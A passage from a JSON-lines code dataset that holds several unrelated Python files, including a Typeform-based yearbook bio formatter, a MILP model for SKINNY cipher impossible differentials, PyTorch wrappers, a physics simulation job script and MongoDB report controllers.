self.player.sum_point())\n\n","repo_name":"banderasz/WitchGuild","sub_path":"test/TestPlayer.py","file_name":"TestPlayer.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"35813267633","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nfrom io import StringIO\nimport numpy as np\nimport pandas as pd\nimport os\nimport re\nfrom requests import session\n\n# UTC times\nSENIOR_BIOFORM_OPEN_DATE = '2017-04-01 00:00:00'\n\npayload = {\n 'action': 'btnlogin',\n '_username': os.environ['TYPEFORM_USERNAME'],\n '_password': os.environ['TYPEFORM_PASSWORD']\n }\n\nhouses = ['Adams', 'Cabot', 'Currier', 'Dudley', 'Dunster', 'Eliot', 'Kirkland',\n 'Leverett', 'Lowell', 'Mather', 'Pforzheimer', 'Quincy', 'Winthrop']\n\n#### SENIORS ####\n'''removes extracurriculars with brackets in their name (e.g. Harvard Yearbook Publications [HYP])'''\ndef remove_brackets(string):\n return re.sub('[ ][\\[].*?[\\]]', '', string)\n\n'''capitalizes first letter of each word very carefully'''\ndef title(string):\n if string:\n string = ' '.join(word[0].upper() + word[1:] for word in string.split())\n for word in ['and', 'the', 'in', 'of', 'on', 'at', 'by', 'to', 'off', 'for', 'between', 'with', 'through', 'out', 'a', 'an']:\n string = string.replace(' {} '.format(word.capitalize()), ' {} '.format(word))\n string = string[0].upper() + string[1:]\n return string\n\ndef get_full_name(row):\n full_name = row['First Name'].title() + ' '\n if row['Middle Name']:\n if len(row['Middle Name']) == 1:\n full_name += row['Middle Name'] + '. '\n else:\n full_name += row['Middle Name'] + ' '\n full_name += row['Last Name']\n if row['Suffix']:\n if 'J' in row['Suffix'].upper():\n full_name += ', Jr.'# + row['Suffix']\n else:\n full_name += ' ' + row['Suffix']\n return full_name \n\ndef edit_school_name(schoolname):\n # bunch of rules\n schoolname = schoolname.replace(' Junior High School', ' High School')\n schoolname = schoolname.replace(' Senior High School', ' High School')\n schoolname = schoolname.replace(' Senior High School', ' High School')\n schoolname = schoolname.replace('Saint ', 'St. ')\n schoolname = schoolname.replace('Mount ', 'Mt. ')\n schoolname = schoolname.replace(' HS', ' High School')\n schoolname = schoolname.replace(' & ', ' and ')\n schoolname = schoolname.replace(' HS', ' High School')\n schoolname = schoolname.replace(' H.S.', ' High School')\n schoolname = schoolname.replace(' H. S.', ' High School')\n\n if schoolname == 'Andover' or 'Phillips Andover' in schoolname:\n schoolname = 'Phillips Academy'\n elif schoolname == 'Exeter' or 'Phillips Exeter' in schoolname:\n schoolname = 'Phillips Exeter Academy'\n elif schoolname == 'Collegiate':\n schoolname = 'Collegiate School'\n schoolname = schoolname.replace('Thomas Jefferson High School for Science and Technology', 'Thomas Jefferson High School')\n\n return schoolname\n\ndef edit_city_name(city):\n if city.lower() in ['new york city', 'ny', 'nyc']:\n city = 'New York'\n\n return city\n\ndef edit_country_name(country):\n if country.lower() in ['u.k.', 'uk', 'northern ireland', 'scotland', 'wales', 'england']:\n country = 'United Kingdom'\n\n return country\n\ndef get_bio_string(row):\n bio = ''\n if row['Date of Birth']:\n birthdate = datetime.strptime(row['Date of Birth'], '%Y-%m-%d')\n if birthdate.year < 1900:\n birthdate = birthdate.replace(year=1900)\n birthdate = birthdate.strftime('%B %-d, %Y')\n # birthdate.replace(' 0', ' ')\n bio += 'Born on: {}. '.format(birthdate)\n\n if row['Secondary School Name']:\n schoolname = edit_school_name(row['Secondary School Name'])\n\n bio += 'Secondary School: ' + title(schoolname) + '. '\n\n # if need to automatically capitalize, then str.title() will work\n if row['Town/City']: \n city = edit_city_name(row['Town/City'])\n country = edit_country_name(row['Country'])\n \n \n bio += 'Hometown: ' + title(city) + ', ' + row['State/Territory'] + title(country) + '. '\n\n # could be done more efficiently but whatever\n bio += 'Field of Concentration: ' \n if row['Concentration Type'] == 'Regular':\n bio += row['Concentration']\n elif row['Concentration Type'] == 'Joint':\n # need to go to Typeform to find this number\n bio += row['Joint Concentration in'] + ' & ' + row['Joint Concentration in {{answer_44252884}} and']\n else:\n bio += row['Concentration.1']\n bio += '. '\n\n if row['Secondary Field']:\n bio += 'Secondary Field: ' + row['Secondary Field'] + '. '\n\n for prize in ['Detur Prize', \n 'Junior Phi Beta Kappa', \n 'Phi Beta Kappa', \n 'John Harvard Scholar', \n 'Harvard College Scholar']:\n if row[prize]:\n bio += prize + '. '\n\n # extracurriculars\n activities = ['Varsity Sport', 'House Activity', 'Activity', 'Club Sport', 'Officer/Leadership Position', 'On-Campus Job', 'Lab or Department Name']\n ec_list = list(row.select(lambda x: x.split('.')[0] in activities))\n\n if ec_list:\n ec = []\n\n for i in xrange(0, len(ec_list), 2):\n if ec_list[i] and ec_list[i + 1]:\n ec.append(ec_list[i] + ' (' + title(ec_list[i + 1]) + ')')\n elif ec_list[i]:\n ec.append(ec_list[i])\n\n # PBHA processing\n pbha = [element.replace('PBHA (', '').replace('Phillips Brooks House Association (', '')\n .replace(')', '')\n .replace(' [PBHA]', '') \n for element in ec\n if '[PBHA]' in element]\n pbha = [element.replace(' (', ': ') + ';' for element in pbha]\n pbha = 'Phillips Brooks House Association (' + ' '.join(pbha)[:-1] + '). '\n\n ec_str = ''\n for element in ec:\n if '[PBHA]' in element:\n ec_str += pbha\n pbha = ''\n # do something\n else:\n # fix Elena's problems\n if element.startswith('Harvard Crimson'):\n element = element.replace('Harvard Crimson', 'The Harvard Crimson')\n if 'Harvard Crimson' in element:\n element = element.replace(' (Associate Editor)', '') \n element = element.replace(', Associate Editor', '') \n element = element.replace('Associate Editor, ', '') \n element = element.replace('Harvard Yearbook Publications, Inc.', 'Harvard Yearbook Publications')\n if element.startswith('Intramurals'):\n element = element.replace('House ', '')\n for house in houses:\n element = element.replace(house + ' ', '')\n\n\n ec_str += element + '. '\n \n ec_str = ec_str.replace(' ', ' ')\n ec_str = remove_brackets(ec_str)\n bio += ec_str\n return bio[:525]\n\ndef get_senior_info(row):\n new_info = [get_full_name(row), \n get_bio_string(row), \n row['House'][:-6], \n row['First Name'], \n row['Last Name'],\n row['Email'],\n row['Submit Date (UTC)']\n ]\n return pd.Series(new_info)\n\ndef download_seniors():\n\n with session() as c:\n c.post('https://admin.typeform.com/login_check', data=payload)\n response = c.get('https://admin.typeform.com/form/3146280/analyze/csv')\n \n seniors = pd.read_csv(StringIO(response.text), dtype=str, encoding='utf-8')\n\n # keep only this year's bioforms\n seniors = seniors[seniors['Start Date (UTC)'] > SENIOR_BIOFORM_OPEN_DATE]\n\n # replace all NaNs\n seniors = seniors.fillna('')\n\n # strip all leading and trailing whitespace\n seniors = seniors.applymap(lambda x: x.strip('. '))\n\n # drop all the yes/no stuff\n seniors = seniors.select(lambda x: not x.startswith('Are you '), axis=1)\n\n # drop duplicates (overrides with most recent submission)\n seniors = seniors.drop_duplicates(subset=['Email'], keep='last')\n\n return seniors\n\ndef get_seniors():\n seniors = download_seniors()\n\n # construct output row\n seniors = seniors.apply(get_senior_info, axis=1)\n seniors.columns = ['fullname', 'bio', 'house', 'first_name', 'last_name', 'email', 'time_submitted']\n \n return seniors.to_csv(index_label='id', encoding='utf-8')\n#### END SENIORS ####\n\n#### GROUPS ####\ndef format_officers(row):\n # officer formatting\n officer_list = list(row.select(lambda x: x.startswith('Officer Position') or x.endswith('Full Name')))\n officers = []\n for i in xrange(0, len(officer_list), 2):\n if officer_list[i] and officer_list[i + 1]:\n officers.append(title(officer_list[i]) + ': ' + title(officer_list[i + 1]) + '; ')\n \n return ''.join(officers)[:-2]\n\ndef get_groups_info(row):\n new_info = [remove_brackets(row['Group Name']), \n row['Organization Description'][:750], \n format_officers(row),\n row['Submit Date (UTC)']\n ]\n return pd.Series(new_info)\n\ndef get_groups():\n with session() as c:\n c.post('https://admin.typeform.com/login_check', data=payload)\n response = c.get('https://admin.typeform.com/form/3146326/analyze/csv')\n\n groups = pd.read_csv(StringIO(response.text), dtype=str, encoding='utf-8')\n\n # keep only this year's bioforms\n groups = groups[groups['Start Date (UTC)'] > SENIOR_BIOFORM_OPEN_DATE]\n\n # replace all NaNs\n groups = groups.fillna('')\n\n # strip all leading and trailing whitespace\n groups = groups.applymap(lambda x: x.strip())\n\n # drop duplicates (overrides with most recent submission)\n groups = groups.drop_duplicates(subset=['Group Name'], keep='last')\n \n # construct output row\n groups = groups.apply(get_groups_info, axis=1)\n groups.columns = ['name', 'blurb', 'officers', 'time_submit']\n \n return groups.to_csv(index_label='id', encoding='utf-8')\n#### END GROUPS ####\n\n#### PROFS ####\ndef process_profs():\n seniors = download_seniors()\n\n profs = seniors[['Professor\\'s First Name', \n 'Professor\\'s Last Name',\n 'Professor\\'s Email', \n 'Professor\\'s Department']]\n profs.columns = ['first_name', 'last_name', 'email', 'dept']\n\n # omit everyone who skipped the question\n to_omit = ['', 'n/a', 'omit', ' ', ' ', '.', '-', 'x', 'na', 'a', 'asdf', 'X', 'first', 'First', 'no', 'No']\n profs = profs.applymap(lambda x : np.nan if x in to_omit else x).dropna()\n\n # sort alphabetically\n profs = profs.sort_values(['last_name', 'first_name'], axis=0)\n\n return profs\n \ndef get_profs():\n profs = process_profs()\n profs.columns = ['first_name', 'last_name', 'email', 'dept']\n \n return profs.to_csv(encoding='utf-8') \n\ndef get_prof_counts():\n\n profs = process_profs()\n prof_counts = profs['last_name'].value_counts()\n \n return prof_counts.to_csv(encoding='utf-8')\n#### END PROFS ####\n","repo_name":"rlouyang/hyp-bioform-flask","sub_path":"hypbioform.py","file_name":"hypbioform.py","file_ext":"py","file_size_in_byte":11016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39988069498","text":"\"\"\"\nClasses from the 'UserManagement' framework.\n\"\"\"\n\ntry:\n from rubicon.objc import ObjCClass\nexcept ValueError:\n\n def ObjCClass(name):\n return None\n\n\ndef _Class(name):\n try:\n return ObjCClass(name)\n except NameError:\n return None\n\n\nUMUserPersonaContext = _Class(\"UMUserPersonaContext\")\nUMUser = _Class(\"UMUser\")\nUMMutableUser = _Class(\"UMMutableUser\")\nUMUserSwitchContext = _Class(\"UMUserSwitchContext\")\nUMPersonaCallbackListener = _Class(\"UMPersonaCallbackListener\")\nUMXPCServer = _Class(\"UMXPCServer\")\nUMLogMessage = _Class(\"UMLogMessage\")\nUMUserPersonaAttributes = _Class(\"UMUserPersonaAttributes\")\nUMLog = _Class(\"UMLog\")\nUMAbort = _Class(\"UMAbort\")\nUMTask = _Class(\"UMTask\")\nUMUserSyncTask = _Class(\"UMUserSyncTask\")\nUMUserSwitchBlockingTask = _Class(\"UMUserSwitchBlockingTask\")\nUMError = _Class(\"UMError\")\nUMQueue = _Class(\"UMQueue\")\nUMUserPersona = _Class(\"UMUserPersona\")\nUMUserMutablePersona = _Class(\"UMUserMutablePersona\")\nUMMobileKeyBag = _Class(\"UMMobileKeyBag\")\nUMUserManager = _Class(\"UMUserManager\")\n","repo_name":"ColdGrub1384/Pyto","sub_path":"Lib/objc/_UserManagement.py","file_name":"_UserManagement.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":824,"dataset":"github-code","pt":"42"} +{"seq_id":"18437968404","text":"import re, os\n\nos.chdir(r'C:\\workspace\\Doit_python\\03\\data')\n\nf = open('friends101.txt', 'r', encoding='utf8')\nscript101 = f.read()\nprint(script101[:100])\n\n# 'Monica:' 다음 아무 문자나 반복되는 (.+) 패턴을 찾아 리스트로 반환\nLine = re.findall(r'Monica:.+', script101)\nprint(Line[:3])\n\nfor item in Line[:3] :\n print(item)\n\nf = open('monica.txt', 'w', encoding='utf8')\n\nmonica = ''\nfor i in Line :\n monica += i + '\\n'\nf.write(monica)\n\n","repo_name":"Yerial1125/Doit_python","sub_path":"03/03_monica.py","file_name":"03_monica.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"2828315473","text":"from functools import WRAPPER_ASSIGNMENTS\nimport torch\n\nfrom ptls.nn.normalization import L2NormEncoder\nfrom ptls.data_load.padded_batch import PaddedBatch\n\n\ndef _pb_shell(cls):\n class PBShell(cls):\n def __init__(self, *args, **kwargs):\n for attr in WRAPPER_ASSIGNMENTS:\n setattr(self, attr, getattr(cls, attr))\n super().__init__(*args, **kwargs)\n\n def forward(self, x: PaddedBatch):\n return PaddedBatch(super().forward(x.payload), x.seq_lens)\n\n return PBShell\n\n\nPBDropout = _pb_shell(torch.nn.Dropout)\nPBLinear = _pb_shell(torch.nn.Linear)\nPBLayerNorm = _pb_shell(torch.nn.LayerNorm)\nPBReLU = _pb_shell(torch.nn.ReLU)\nPBL2Norm = _pb_shell(L2NormEncoder)\n","repo_name":"dllllb/pytorch-lifestream","sub_path":"ptls/nn/pb.py","file_name":"pb.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"42"} +{"seq_id":"74002502526","text":"inf = float('inf')\ndef solution():\n for _ in range(int(input())):\n n = int(input())\n A = list(reversed(list(map(int, input().split()))))\n\n Seen = set()\n ii = 0\n while ii < n:\n if A[ii] in Seen:\n break\n Seen.add(A[ii])\n ii += 1\n print(n-ii)\n\n\nif __name__ == \"__main__\":\n solution()","repo_name":"thatpythonguys/CP","sub_path":"CF Round 811/B_Remove_Prefix.py","file_name":"B_Remove_Prefix.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"510248326","text":"import gurobipy\nfrom primitive import AesLike\nfrom itertools import product as itp\nfrom itertools import starmap as itsm\nimport utilities\n\nshift_rows = [0, 1, 2, 3, 7, 4, 5, 6, 10, 11, 8, 9, 13, 14, 15, 12]\n\nmixcol_equiv = [\n [0, 0, 0, 1, 1, 0, 0, 1],\n [1, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 0, 0, 0, 1],\n]\n\nmixcol_origin = [\n [1, 0, 1, 1, 1, 0, 0, 0],\n [1, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 0, 0, 0, 1],\n]\n\n\nclass Skinny(AesLike):\n \"\"\" Gurobi Model for Skinny-128 differential trails. \"\"\"\n\n def __init__(self, nb_rounds, sbox_file, mixcol=\"equiv\"):\n\n # Different choices of MixColumns models.\n if mixcol == \"equiv\":\n self.mixcol = mixcol_equiv\n else:\n self.mixcol = mixcol_origin\n AesLike.__init__(self, 128, nb_rounds, sbox_file)\n\n def linear_layer(self, x_in, x_out):\n x_in = [\n x_in[(8 * shift_rows[i // 8]) + (i % 8)] for i in range(128)\n ] # variables after the shift_rows, at the input of mixcol\n\n for col, bit in itp(range(4), range(8)):\n bit_list = [x_in[(32 * row) + (8 * col) + bit] for row in range(4)] + [\n x_out[(32 * row) + (8 * col) + bit] for row in range(4)\n ]\n\n self.add_bin_matrix_constr(\n self.mixcol, bit_list, 0, mode=\"binary\",\n )\n\n\ndef lin_layer(x):\n \"\"\" Skinny linear layer implementation for testing purposes. \"\"\"\n # Collect in cells\n nib = {}\n for i in range(16):\n nib[i] = (x >> (8 * i)) & 0xFF\n\n # Shift rows\n nib2 = {}\n for row in range(4):\n for j in range(4):\n nib2[(4 * row) + ((j + row) % 4)] = nib[(4 * row) + j]\n\n # Collect in rows\n row = {}\n for i in range(4):\n row[i] = 0\n for j in range(4):\n row[i] ^= nib2[(4 * i) + j] << (8 * j)\n\n # Mixcolumns\n row[1] ^= row[2]\n row[2] ^= row[0]\n row[3] ^= row[2]\n\n row2 = {}\n for i in range(4):\n row2[i] = row[(i - 1) % 4]\n\n # Collect in int\n out = 0\n for i in range(4):\n out ^= row2[i] << (32 * i)\n\n return out\n\n\ndef test_linear_layer():\n \"\"\"\n Testing the modeling of the linear layer with identity Sbox.\n \"\"\"\n n = 10\n mid = Skinny(n, \"identity_sbox_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n y = x\n for j in range(n - 1):\n y = lin_layer(y)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(the_set, message=\"Linear layer test.\")\n assert len(res) == 0\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n y = x\n for j in range(n - 1):\n y = lin_layer(y)\n the_set.add((x, y ^ 1))\n\n res = mid.search_impossible_diff(the_set, message=\"Linear layer test.\")\n assert len(res) == 16\n\n print(\"Linear layer test OK.\")\n\n\ndef test_paper_single_impossible_diff():\n \"\"\"\n Testing the model with arbitrary Sbox against\n the truncated impossible differential trail given in the\n eprint paper:\n The SKINNY Family of Block Ciphers and its Low-Latency Variant MANTIS.\n from the authors of Skinny.\n \"\"\"\n n = 11\n mid = Skinny(n, \"arbitrary_sbox_8_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n x = 1 << (8 * 12)\n y = 1 << (8 * 7)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(\n the_set, message=\"Paper single impossible differential.\"\n )\n assert len(res) == 1\n\n print(\"Single impossible differential OK.\")\n\n\ndef test_paper_all_impossible_diff():\n \"\"\"\n Same as above with all the impossible differentials.\n \"\"\"\n n = 12\n mid = Skinny(n, \"arbitrary_sbox_8_8.pkl\")\n mid.model.setParam(\"LogToConsole\", 0)\n\n the_set = set()\n for i in range(16):\n x = 1 << (8 * i)\n for j in range(16):\n y = 1 << (8 * j)\n the_set.add((x, y))\n\n res = mid.search_impossible_diff(the_set, message=\"Paper impossible differentials.\")\n\n assert len(res) == 12\n\n print(\"All impossible differentials test OK.\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n This section aims at testing this MIP model of Skinny\n for impossible differential search.\n \"\"\"\n test_linear_layer()\n test_paper_single_impossible_diff()\n test_paper_all_impossible_diff()\n","repo_name":"dnlcog/efficient_milp_modelings","sub_path":"impossible_differentials/skinny.py","file_name":"skinny.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"42"} +{"seq_id":"4402508852","text":"\"\"\"\nA imobiliária XYZ vende apenas terrenos\nretangulares. Faça um programa para ler\nas dimensões de um terreno e exibir a\nárea do mesmo.\n\"\"\"\nladoA = int(input(\"Lado A : \"))\nladoB = int(input(\"Lado B : \"))\narea = ladoA * ladoB\nprint(f\"{area}\")","repo_name":"alanabclins/LearningPython","sub_path":"codes/2.Introducao/imobiliaria.py","file_name":"imobiliaria.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8759033674","text":"\"\"\"!\n@file slic_to_recon_job.py\n\nSimulation of signals in detector (using SLIC) and readout.\nThe simulation is followed by reconstruction of the events.\n\"\"\"\nimport os\nfrom hpsmc.tools import SLIC, JobManager, ExtractEventsWithHitAtHodoEcal\n\n## Get job input file targets\ninputs = list(job.input_files.values())\n\njob.description = 'slic to recon'\n\n## event_int needs to be set to 250 for beam files; should be = 1 for signal files\nif 'event_interval' in job.params:\n event_int = job.params['event_interval']\nelse:\n event_int = 1\n\nif 'nevents' in job.params:\n nevents = job.params['nevents']\nelse:\n nevents = 10000\n\nif 'base_name' in job.params:\n base_name = job.params['base_name']\nelse:\n base_name = ''\n\n## Input beam events (StdHep format)\nslic_file_names = []\nfor i in range(len(inputs)):\n filename, file_extension = os.path.splitext(inputs[i])\n slic_file = filename + '.slcio'\n slic_file_names.append(slic_file)\n\n## Simulate beam events\nslic_comps = []\nfor i in range(len(inputs)):\n slic_comps.append(SLIC(inputs=[inputs[i]],\n outputs=[slic_file_names[i]],\n nevents=nevents * event_int,\n ignore_job_params=['nevents'])\n )\n\n## concatenate beam events before merging\ncat_out_name = base_name + '_slic_cat.slcio'\nslic_cat = ExtractEventsWithHitAtHodoEcal(inputs=slic_file_names,\n outputs=[cat_out_name],\n event_interval=0, num_hodo_hits=0)\n\n## Run simulated events in readout to generate triggers\nreadout_out_name = base_name + '_readout.slcio'\nreadout = JobManager(steering='readout',\n inputs=slic_cat.output_files(),\n outputs=[readout_out_name])\n\n## Run physics reconstruction\nrecon_out_name = base_name + '_recon.slcio'\nrecon = JobManager(steering='recon',\n inputs=readout.output_files(),\n outputs=[recon_out_name])\n\n## Add the components\ncomps = slic_comps\ncomps.extend([slic_cat, readout, recon])\njob.add(comps)\n","repo_name":"JeffersonLab/hps-mc","sub_path":"python/jobs/slic_to_recon_job.py","file_name":"slic_to_recon_job.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"70936887486","text":"from opentelemetry import trace\n\n\ntracer = trace.get_tracer(__name__)\n\n\nclass CurrentSpan:\n \"\"\"\n Wraps open telemetry start_as_current_span method.\n Intention to have this class is supporting of enabled flag to does nothing\n if open telemtry is disabled on application level.\n\n \"\"\"\n def __init__(self, span_name, enabled):\n self.span_name = span_name\n self.enabled = enabled\n\n def __enter__(self):\n if not self.enabled:\n return\n self.trace = tracer.start_as_current_span(self.span_name)\n self.trace.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if not self.enabled:\n return\n self.trace.__exit__(exc_type, exc_val, exc_tb)\n","repo_name":"broHeryk/sqall-fork","sub_path":"squall/opentelemetry/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43006879080","text":"\nimport numpy as np\nfrom numpy import array\nfrom math import pi\n\n# argmin function\ndef argmin(lst):\n return min(range(len(lst)), key=lst.__getitem__)\n\n# Ackley function\n## Input: array(D, ) -> float\ndef ackley_f(x):\n x = x.reshape(-1)\n lhs = 20 * np.exp((-0.2) * np.sqrt(np.mean((x ** 2))))\n rhs = np.exp(np.mean(np.cos(2 * pi * x)))\n result = -1 * (lhs + rhs) + 20 + np.exp(array([1]))\n return result.item()\n\n# Weierstrass function\n## Input: array(D, ) -> float\ndef weierstrass_f(x, a=0.5, b=3, kmax=20):\n x = (x * 0.5) / 100\n x = x.reshape(-1)\n D = x.shape[0]\n\n lhs = 0\n rhs = 0\n for k in range(kmax):\n lhs += np.sum((a ** k) * np.cos(2 * pi * (b ** k) * (x + 0.5)))\n rhs += (a ** k) * np.cos(array([pi * (b ** k)]))\n result = lhs - D * rhs + 600\n return result.item()","repo_name":"Quan-En/Optimization","sub_path":"assignment3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"31436002793","text":"\"\"\"Module for controllers.\"\"\"\nfrom datetime import datetime\nimport json\n\nfrom exceptions import NoReportsFound, ReportAlreadyExists, ReportNotFound\nfrom models import Report, TokenizedReport\nfrom sidrd import SIDRD\n\n# CRUD Reports\n\ndef get_report(report_id: int) -> Report:\n \"\"\"\n Get a report from the database.\n Args:\n report_id: id of the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = get_report(12345)\n \"\"\"\n report = Report.get(report_id) # May raise ReportNotFound\n return report\n\ndef get_reports(filters: dict = {}, limit: int = 100) -> list:\n \"\"\"\n Get limit reports from the database.\n Args:\n filters: dict, filters to apply to the reports.\n Available fields: report_id, dupe_of, status, component, creation_time\n Must be strings\n limit: limit of the number of reports to get.\n Returns:\n reports: list of reports (Report)\n Exceptions:\n NoReportsFound. If there are no reports in the database.\n Example:\n >>> reports = get_reports(filters={\"dupe_of\": \"None\"}, limit=10)\n \"\"\"\n reports = Report.get_reports(filters, limit) # May raise NoReportsFound\n return reports\n\ndef create_report(report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list) -> Report:\n \"\"\"\n Create a report in the database.\n Args:\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportAlreadyExists. If the report already exists.\n Example:\n >>> report = create_report(report)\n \"\"\"\n report = Report.insert(report_id, creation_time, \n status, component, dupe_of, \n summary, comments) # May raise ReportAlreadyExists\n return report\n\ndef create_many_reports(reports: list) -> int:\n \"\"\"\n Create many reports in the database.\n Args:\n reports: list of reports (Report)\n Returns:\n reports: number of reports created.\n Example:\n >>> reports = create_many_reports([{'report_id': 1, 'creation_time': ...}, ...])\n \"\"\"\n inserted_reports = 0\n\n if reports:\n for rp in reports:\n report = Report(**rp) if type(rp) == dict else rp\n try:\n create_report(report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments) # May raise ReportAlreadyExists\n inserted_reports += 1\n except ReportAlreadyExists:\n pass\n \n return inserted_reports\n\ndef update_report(_id: int, report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text: str, tokens: list) -> Report:\n \"\"\"\n Update a report in the database.\n Args:\n _id: mongo id of the report.\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:Report report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = update_report(12345, 657,...)\n \"\"\"\n report = TokenizedReport.update(_id, report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportNotFound\n return report\n\ndef delete_report(report_id: int) -> None:\n \"\"\"\n Delete a report from the database.\n Args:\n report_id: report_id of the report.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> delete_report(12345)\n \"\"\"\n return Report.delete(report_id=report_id) # May raise ReportNotFound\n\ndef delete_all_reports() -> int:\n \"\"\"\n Delete all reports from the database.\n Returns:\n int: number of reports deleted.\n Example:\n >>> num_deleted = delete_all_reports()\n \"\"\"\n return Report.delete_all() # May raise NoReportsFound\n\n###############################################################################\n\n# SIDRD Update\n\n\ndef get_tokenized_report(report_id: int) -> TokenizedReport:\n \"\"\"\n Get a report from the database.\n Args:\n report_id: id of the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = get_tokenized_report(12345)\n \"\"\"\n report = TokenizedReport.get(report_id) # May raise ReportNotFound\n return report\n\ndef get_tokenized_reports(filters: dict = {}, limit: int = 5000) -> list:\n \"\"\"\n Get all tokenized reports from the database.\n Args:\n limit: limit of the number of reports to get.\n Returns:\n reports: list of reports (TokenizedReport)\n Exceptions:\n NoReportsFound. If there are no reports in the database.\n Example:\n >>> reports = get_tokenized_reports()\n \"\"\"\n reports = TokenizedReport.get_reports(filters=filters, limit=limit) # May raise NoReportsFound\n return reports\n\n\ndef create_tokenized_report(report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text:str, tokens:list) -> TokenizedReport:\n \"\"\"\n Create a report in the database.\n Args:\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportAlreadyExists. If the report already exists.\n Example:\n >>> report = create_tokenized_report(report)\n \"\"\"\n report = TokenizedReport.insert(report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportAlreadyExists\n return report\n\ndef create_many_tokenized_reports(reports: list) -> int:\n \"\"\"\n Create many reports in the database.\n Args:\n reports: list of reports (TokenizedReport)\n Returns:\n reports: number of reports created.\n Example:\n >>> reports = create_many_tokenized_reports([{'report_id': 1, 'creation_time': ...}, ...])\n \"\"\"\n inserted_reports = 0\n\n if reports:\n for rp in reports:\n report = TokenizedReport(**rp) if type(rp) == dict else rp\n try:\n create_tokenized_report(report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments, report.text, report.tokens) # May raise ReportAlreadyExists\n inserted_reports += 1\n except ReportAlreadyExists:\n pass\n \n return inserted_reports\n\ndef update_tokenized_report(_id: int, report_id: int, creation_time: datetime,\n status: str, component: str, dupe_of: int,\n summary: str, comments: list, text: str, tokens: list) -> TokenizedReport:\n \"\"\"\n Update a report in the database.\n Args:\n _id: mongo id of the report.\n report_id: id of the report.\n creation_time: creation time of the report.\n status: status of the report.\n component: component of the report.\n dupe_of: id of the report this is a duplicate of. None if not a duplicate.\n summary: summary of the report.\n comments: list of comments for the report.\n text: text of the report.\n tokens: list of tokens for the report.\n Returns:\n report:TokenizedReport report from the database.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> report = update_report(12345, 657,...)\n \"\"\"\n report = TokenizedReport.update(_id, report_id, creation_time, \n status, component, dupe_of, \n summary, comments, text, tokens) # May raise ReportNotFound\n return report\n\ndef delete_tokenized_report(report_id: int) -> None:\n \"\"\"\n Delete a report from the database.\n Args:\n report_id: report_id of the report.\n Exceptions:\n ReportNotFound. If the report does not exist.\n Example:\n >>> delete_tokenized_report(12345)\n \"\"\"\n return TokenizedReport.delete(report_id=report_id) # May raise ReportNotFound\n\ndef delete_all_tokenized_reports() -> int:\n \"\"\"\n Delete all reports from the database.\n Returns:\n int: number of reports deleted.\n Example:\n >>> num_deleted = 